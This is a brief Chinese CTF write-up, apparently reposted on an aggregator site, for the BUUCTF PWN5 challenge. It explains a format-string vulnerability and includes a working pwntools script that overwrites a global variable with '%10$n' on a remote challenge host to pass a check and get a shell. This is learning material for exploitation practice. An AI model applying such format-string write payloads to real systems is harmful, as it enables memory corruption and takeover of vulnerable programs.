這題是個基本格式化字符串漏洞利用;

滿足if條件即可得到答案;

使 nptr 與 dword_804C044 相等即可;

可以使我們利用的是 第一次的輸入輸出;

addr=0x804C044 payload=p32(addr)+'%10$n'

先得出偏移量:

from pwn import * p=remote('node3.buuoj.cn',26937) addr=0x804C044 payload=p32(addr)+'%10$n' p.sendline(payload) p.sendline('4') p.interactive()

有問題歡迎留言 ?

與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的(Buuctf) [第五空间2019 决赛]PWN5 简单格式化字符串漏洞利用的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。